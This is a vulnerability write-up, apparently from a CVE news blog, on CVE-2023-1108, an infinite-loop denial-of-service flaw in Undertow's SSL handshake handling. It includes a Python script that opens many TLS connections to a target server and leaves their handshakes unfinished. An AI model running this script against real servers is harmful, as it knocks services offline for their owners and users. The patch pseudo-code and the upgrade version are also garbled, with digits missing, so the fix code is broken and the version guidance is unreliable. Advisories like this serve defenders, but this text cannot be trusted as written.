CVE CyberSecurity Database News

CVE-2023-1108 - Denial-of-Service in Undertow via SSL Handshake Infinite Loop

Poster -

A newly discovered vulnerability, CVE-2023-1108, affects the Undertow web server. This server is widely used behind application servers like WildFly and JBoss. This flaw can allow attackers to trigger a denial of service (DoS) by exploiting an infinite loop in the SSL handshake process, effectively making servers unresponsive. In this post, we'll break down what happened, how it works, and why it's important, all in simple, straightforward language.

What is Undertow?

Undertow is a flexible Java web server, often used for powering modern Java applications due to its lightweight and non-blocking nature. It's commonly shipped with products like Red Hat JBoss EAP and WildFly.

What is CVE-2023-1108?

- CVE-ID: CVE-2023-1108

Root Cause: Handshake Loop in SslConduit

The problem lies in the SslConduit class, which handles SSL/TLS handshakes. In normal operation, a handshake lets a client and server securely set up encryption before exchanging sensitive data. However, due to a logic error, the loop responsible for progressing the handshake may never exit under certain conditions, eating up CPU cycles and potentially hanging the whole server.

Here’s a simplified version of what the bad code looked like

// Pseudo-code inspired by the original SslConduit.java
while (handshakeStatus == NEED_WRAP || handshakeStatus == NEED_UNWRAP) {
    doHandshakeStep();
    // Missing: check for changed handshakeStatus or loop breaker
}

In real code, failure to update or check handshakeStatus correctly can mean the loop just keeps going, never realizing that it should stop or give up.

How Can It Be Exploited?

An attacker can exploit CVE-2023-1108 by initiating an SSL/TLS connection but manipulating the flow in such a way that the server gets stuck in this handshake loop. For example, a client can:

Force edge cases where the loop condition is never satisfied.

If attackers open multiple such connections, they can quickly tie up all the server threads or CPU, causing a denial of service.

Proof of Concept: Triggering the Issue

Below is a simple example using Python. It tries to open multiple SSL connections to the vulnerable server, sending partial handshakes, and then stops. If done in quick succession or at scale, this can hang or crash the server.

import socket
import ssl
import time

HOST = 'target.server.com'
PORT = 8443

for i in range(50):  # Opens multiple connections
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        # Wrap socket in SSL, but do NOT complete handshake
        context = ssl.create_default_context()
        ssock = context.wrap_socket(s, server_hostname=HOST, do_handshake_on_connect=False)
        # Do not call ssock.do_handshake(), just leave it hanging
        print(f'Connection {i} opened and left in handshake...')
        time.sleep(.5)
    except Exception as e:
        print(e)

> WARNING: This is for educational purposes on your own test environments only. Never target production systems you don't own!

Availability: Services stall, time out, or crash.

- CPU/Thread Starvation: All server resources can be exhausted by dangling handshakes.

Fix and Mitigation

The authors fixed this by adding better state checks and breaking the loop if the handshake is stuck. The patch ensures the loop does not run indefinitely.

- Upgrade Undertow to 2.2.21.Final or 2.3..Alpha2, or any newer version.
- See Red Hat's security advisory for more info.

Example of the Patch (simplified pseudo-code)

int loopLimit = 100;
while ((handshakeStatus == NEED_WRAP || handshakeStatus == NEED_UNWRAP) && loopLimit-- > ) {
    doHandshakeStep();
    // Now the loop will break after 100 tries
}
if (loopLimit <= ) {
    throw new SSLException("Handshake loop limit exceeded, possible attack detected");
}

References & Further Reading

- National Vulnerability Database entry
- Undertow security fixes
- Red Hat CVE Page
- Undertow official site

Conclusion

CVE-2023-1108 is a classic example of how tiny mistakes in low-level code can create big vulnerabilities, especially in software as widely used as Undertow. If you use this server or products that embed it, update now to stay safe! Protect your vital web apps from simple but devastating denial-of-service attacks.

Timeline

Published on: 09/14/2023 15:15:00 UTC
Last modified on: 09/20/2023 20:16:00 UTC